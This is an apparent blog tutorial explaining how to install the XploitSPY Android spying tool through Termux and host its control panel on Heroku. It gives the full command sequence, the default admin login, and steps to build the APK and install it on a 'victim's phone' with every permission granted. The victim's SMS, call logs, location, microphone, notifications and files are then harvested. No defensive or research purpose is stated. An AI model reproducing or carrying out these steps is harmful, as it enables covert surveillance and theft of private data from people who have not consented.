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How to install and use XploitSpy in termux?

xploitspy termux

How to install and use XploitSpy in termux?
XploitSPY is an Android monitoring or spying tool. With the help of this tool, you can achieve a remote control on any android device to access their data such as messages, call records, files etc..

Features of xploitspy tool
GPS Logging
Microphone Recording
View Contacts
SMS Logs
Send SMS
Call Logs
View Installed Apps
View Stub Permissions
Live Clipboard Logging
Live Notification Logging (WhatsApp, Facebook, Instagram, Gmail and more ….)
View WiFi Networks (logs previously seen)
File Explorer & Downloader
Command Queuing
Built-In APK Builder
Installation and Usage
1. Install termux and update and upgrade it using the command apt-update && upgrade
2. Now, exit from termux, after that open your web browser and create an account in Heroku (Heroku is an online server that helps to monitor our RAT activity without any issue, so we have to use this as a tunnel.) Go tohttps://heroku.com and create an account there and after that click on create a new app and give it a name which you can remember later on and after that app will be created in the Heroku server.

3. Now, lets come back to termux and enter the below commands step by step.
pkg install git -y
pkg install nodejs
npm install -g heroku
cd $HOME
npm install -g heroku
git clone -b herooku https://github.com/XploitWizer/XploitSPY
cd XploitSPY
heroku login -i

(Now a pop-up might appear asking for permission to open a browser inorder to log in into heroku.Here you just have to press the enter key and the browser will open and the login into heroku.)
heroku git:remote -a (your appname here)
ex:- heroku git:remote -a bugrat
heroku buildpacks:add heroku/jvm
heroku buildpacks:add heroku/nodejs
git push -f heroku herooku:master
Now app creating process will be started in the terminal of termux so just wait for some time and after the completion of creating app,a link along with your app name will appear.

Example:- https://yourappname.herokuapp.com
Just copy that link from your terminal and paste it into your browser and xploitspy tool page will be opened and after that it will ask for username and password.Enter admin as a username and password as a password. After logging in successfully now turn on the desktop mode in your browser after that a new button will appear in xploitspy website that is APK builder. Click on that button and after that the app will be created within a minute,download it and install it in your victim’s phone,allowing all permissions.

To access your hacked devices, just log in every time in xploitspy web and click on devices and after that, you can see the available devices and to get data from it click on manage and after that, you can get whatever data you need from your victim’s device.

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